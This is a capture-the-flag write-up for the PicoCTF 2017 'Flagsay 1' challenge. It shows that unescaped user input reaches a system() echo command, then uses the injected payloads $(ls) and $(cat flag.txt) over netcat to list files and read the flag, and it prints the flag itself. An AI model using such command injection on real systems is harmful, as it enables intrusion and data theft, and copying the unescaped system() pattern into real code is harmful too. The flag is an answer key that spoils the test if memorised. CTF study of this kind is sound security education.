PicoCTF_2017: Flagsay 1

Category: Binary Points: 80 Description:

I heard you like flags, so now you can make your own! Exhilarating! Use flagsay-1! Source. Connect on shell2017.picoctf.com:51865.

Hint:

System will run exactly what the program gives it

Write-up

Another simple 1, looking at the source code reveals that whatever is inputted by the user is then echo by system.

char commandBase[] = "/bin/echo \"%s\"\n";

However, input is unescaped, so we can pass on a shell command like

$ nc shell2017.picoctf.com 51865
$(ls)
               _                                        
              //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~     
             //flagsay-1
flagsay-1_no_aslr
flag.txt
xinetd_wrapper.sh                              /     
            //                                   /      
           //                                   /       
          //                                   /        
         //                                   /         
        //                                   /          
       //___________________________________/           
      //                                                
     //                                                 
    //                                                  
   //                                                   
  //                                                    
 //

Then, we can do something like this

$ nc shell2017.picoctf.com 51865
$(cat flag.txt)
               _                                        
              //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~     
             //2ab2050bf32e84975a10d774a919e1d0                    /     
            //                                   /      
           //                                   /       
          //                                   /        
         //                                   /         
        //                                   /          
       //___________________________________/           
      //                                                
     //                                                 
    //                                                  
   //                                                   
  //                                                    
 // 

Therefore, the flag is 2ab2050bf32e84975a10d774a919e1d0.

results matching ""

    No results matching ""